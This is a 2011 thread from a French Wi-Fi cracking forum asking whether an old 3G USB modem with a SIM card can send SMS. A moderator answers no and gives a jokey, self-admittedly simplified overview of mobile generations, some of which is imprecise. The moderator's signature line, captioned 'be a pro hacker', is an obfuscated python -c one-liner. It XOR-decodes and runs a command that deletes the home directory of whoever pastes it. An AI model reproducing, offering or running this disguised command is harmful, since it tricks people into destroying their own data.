Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 05-10-2011 20:25:58

yasmine
Membre Indispensable

Un modem 3G peut il remplacer un modem GSM pour envoyer sms ?

Voilà

Ca a été très simple pour moi de faire fonctionner un modem et une connection 3G sur mon Ubuntu 11.04.
Et en plus, j ai crée un réseau wifi avec ma carte réseau wifi fonctionnel (partage). Donc je partage la connection en 3G avec d autres amis!!

Du coup, j ai appelé un ami, pour lui annocer mon exploit (LOL).

Mais, il m a posé une colle en me demandant si à la place de la clé 3G (encore avec abonnement et garantie), on peut mettre une vieille clé usb 3G (modem, Huawei E160) avec une carte SIM (téléphone), valable, pour envoyer des SMS.

Merci

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 05-10-2011 22:44:31

spawn
Modérateur

Re : Un modem 3G peut il remplacer un modem GSM pour envoyer sms ?

non.

Explication :        (messieurs les puristes, ceci est une brève explication avec des raccourcis et amalgames ! )

Le 1G, on oublie. c'était la fin des années 1970, et tout le monde a oublié.

Donc rien.

Le 2G (GSM) date de 1982 et a été finalisé en 1990.

[G]roupe[s]pécial[M]obile
Les fréquences allaient de 890 à 915 MHz et de 935 à 960 MHz au début, et on a ajouté la bande des 1800 MHz.
Je ne sais pas si on utilise encore les deux bandes du début.
La téléphonie y est transportée de manière numérique, mais c'est pas du paquet. Et l'accès c'est du [T]ime[D]ivision[M]utliple[A]ccess
Vitesse max : 9.6 Kbit/s

Le 2,5G a servi a préparer le réseau mobile aux paquets (en en créant un second en parallèle)
Au moyen du [G]eneral[P]acket[R]adio[s]ervice puis du [E]nhanced[D]ata.for[G]sm[E]volution .

La 3G  (UMTS) a été créée en 2000 et ne s'est réellement imposée qu'en 2005.
Le mode paquet est mis en place, mais la gestion de la parole téléphonique reste similaire au GSM.
On fait passer le plus de choses par paquet.
L'accès c'est TDMA, FDMA et CDMA, mais plus TDMA pour des raisons de brouillage radio.
Vitesse max : 384 Kbit/s

La 3,5G, c'est presque de la 4G. On est passé de l'ATM (3G) à l'IP, bref, on s'approche beaucoup d'un monde d'addresses IP style Internet, mais c'est pas encore ça.
UMTS release 8, c'est la [L]ong[T]erm[E]volution, et ça gère la fougère, on atteint les 100Mbit/s en down et 50Mbit/s en up.

La 4G, c'est le tout IP.
Le réseau mobile est IDENTIQUE au réseau fixe.
Et ca, c'est du Chuck Norris inside.
Même la parole téléphonique est transportée dans des paquets IP.

La 5G, c'est pour l'iPhone 5.

Pour tous, ce ne sont pas les mêmes fréquences. Celles-ci dépendent des pays et des opérateurs qui les ont achetés.
Vérifie donc sur quelles fréquences tu peux émettre.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.024 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]